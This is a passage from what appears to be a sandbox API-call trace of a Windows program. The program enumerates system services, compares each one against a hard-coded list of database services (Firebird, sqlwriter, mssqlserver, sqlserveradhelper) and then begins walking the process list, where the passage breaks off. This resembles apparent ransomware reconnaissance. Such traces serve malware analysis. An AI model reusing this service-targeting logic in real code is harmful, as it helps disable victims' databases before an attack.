lstrlenW (lpString="ClickToRunSvc") returned 13 [0054.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0054.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0054.486] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0054.487] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0054.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0054.487] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0054.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0054.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0054.487] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0054.487] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0054.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0054.487] lstrlenW (lpString="CryptSvc") returned 8 [0054.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0054.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0054.487] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0054.487] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0054.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0054.487] lstrlenW (lpString="DcomLaunch") returned 10 [0054.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.487] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0054.487] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0054.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0054.487] lstrlenW (lpString="DeviceAssociationService") returned 24 [0054.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0054.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0054.487] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0054.487] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0054.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0054.488] lstrlenW (lpString="Dhcp") returned 4 [0054.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0054.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0054.488] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0054.488] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0054.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0054.488] lstrlenW (lpString="Dnscache") returned 8 [0054.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0054.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0054.488] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0054.488] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0054.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0054.488] lstrlenW (lpString="DoSvc") returned 5 [0054.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0054.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0054.488] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0054.488] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0054.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0054.488] lstrlenW (lpString="DPS") returned 3 [0054.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0054.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0054.489] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0054.489] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0054.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0054.489] lstrlenW (lpString="DusmSvc") returned 7 [0054.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0054.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0054.489] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0054.489] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0054.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0054.489] lstrlenW (lpString="EventLog") returned 8 [0054.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0054.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0054.489] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0054.489] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0054.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0054.489] lstrlenW (lpString="EventSystem") returned 11 [0054.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0054.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0054.489] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0054.489] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0054.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0054.490] lstrlenW (lpString="FontCache") returned 9 [0054.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0054.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0054.490] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0054.490] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0054.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0054.490] lstrlenW (lpString="gpsvc") returned 5 [0054.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0054.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0054.490] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0054.490] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0054.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0054.490] lstrlenW (lpString="iphlpsvc") returned 8 [0054.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.490] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0054.490] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0054.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0054.490] lstrlenW (lpString="KeyIso") returned 6 [0054.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0054.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0054.491] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0054.491] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0054.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0054.491] lstrlenW (lpString="LanmanServer") returned 12 [0054.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0054.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0054.491] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0054.491] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0054.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0054.491] lstrlenW (lpString="LanmanWorkstation") returned 17 [0054.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.491] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0054.491] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0054.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0054.491] lstrlenW (lpString="lfsvc") returned 5 [0054.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0054.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0054.492] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0054.492] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0054.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0054.492] lstrlenW (lpString="lmhosts") returned 7 [0054.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0054.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0054.492] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0054.492] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0054.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0054.492] lstrlenW (lpString="LSM") returned 3 [0054.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0054.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0054.492] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0054.492] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0054.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0054.492] lstrlenW (lpString="MpsSvc") returned 6 [0054.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0054.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0054.492] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0054.492] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0054.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0054.492] lstrlenW (lpString="NcbService") returned 10 [0054.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0054.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0054.493] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0054.493] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0054.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0054.493] lstrlenW (lpString="netprofm") returned 8 [0054.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0054.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0054.493] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0054.493] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0054.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0054.493] lstrlenW (lpString="NlaSvc") returned 6 [0054.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0054.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0054.493] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0054.493] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0054.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0054.493] lstrlenW (lpString="nsi") returned 3 [0054.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0054.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0054.493] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0054.493] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0054.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0054.494] lstrlenW (lpString="PcaSvc") returned 6 [0054.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0054.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0054.494] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0054.494] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0054.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0054.494] lstrlenW (lpString="PlugPlay") returned 8 [0054.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0054.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0054.494] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0054.494] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0054.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0054.494] lstrlenW (lpString="Power") returned 5 [0054.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0054.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0054.494] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0054.494] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0054.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0054.494] lstrlenW (lpString="ProfSvc") returned 7 [0054.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0054.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0054.494] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0054.495] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0054.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0054.495] lstrlenW (lpString="RpcEptMapper") returned 12 [0054.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.495] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0054.495] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0054.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0054.495] lstrlenW (lpString="RpcSs") returned 5 [0054.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0054.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0054.495] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0054.495] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0054.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0054.495] lstrlenW (lpString="SamSs") returned 5 [0054.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0054.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0054.495] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0054.495] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0054.495] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0054.495] lstrlenW (lpString="Schedule") returned 8 [0054.495] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0054.495] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0054.495] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0054.495] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0054.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0054.496] lstrlenW (lpString="SecurityHealthService") returned 21 [0054.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0054.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0054.496] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0054.496] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0054.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0054.496] lstrlenW (lpString="SENS") returned 4 [0054.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0054.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0054.496] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0054.496] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0054.496] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0054.496] lstrlenW (lpString="ShellHWDetection") returned 16 [0054.496] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.496] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.496] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0054.496] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0054.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0054.497] lstrlenW (lpString="Spooler") returned 7 [0054.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0054.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0054.497] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0054.497] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0054.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0054.497] lstrlenW (lpString="SSDPSRV") returned 7 [0054.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0054.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0054.497] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0054.497] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0054.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0054.497] lstrlenW (lpString="StateRepository") returned 15 [0054.497] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0054.497] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0054.497] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0054.497] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0054.497] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0054.497] lstrlenW (lpString="SysMain") returned 7 [0054.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0054.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0054.498] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0054.498] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0054.498] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0054.498] lstrlenW (lpString="SystemEventsBroker") returned 18 [0054.498] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0054.498] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0054.498] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0054.498] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0054.498] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x320 [0054.504] Process32FirstW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0054.505] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0054.506] lstrlenW (lpString="System") returned 6 [0054.506] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0054.507] lstrlenW (lpString="smss.exe") returned 8 [0054.507] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.508] lstrlenW (lpString="csrss.exe") returned 9 [0054.508] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0054.509] lstrlenW (lpString="wininit.exe") returned 11 [0054.509] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.510] lstrlenW (lpString="csrss.exe") returned 9 [0054.510] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0054.511] lstrlenW (lpString="winlogon.exe") returned 12 [0054.511] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0054.513] lstrlenW (lpString="services.exe") returned 12 [0054.513] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0054.513] lstrlenW (lpString="lsass.exe") returned 9 [0054.514] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.514] lstrlenW (lpString="svchost.exe") returned 11 [0054.514] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0054.515] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0054.515] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0054.516] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0054.516] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.517] lstrlenW (lpString="svchost.exe") returned 11 [0054.517] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0054.518] lstrlenW (lpString="dwm.exe") returned 7 [0054.518] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.519] lstrlenW (lpString="svchost.exe") returned 11 [0054.519] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.520] lstrlenW (lpString="svchost.exe") returned 11 [0054.520] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.520] lstrlenW (lpString="svchost.exe") returned 11 [0054.521] Process32NextW (in: hSnapshot=0x320, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.521] lstrlenW 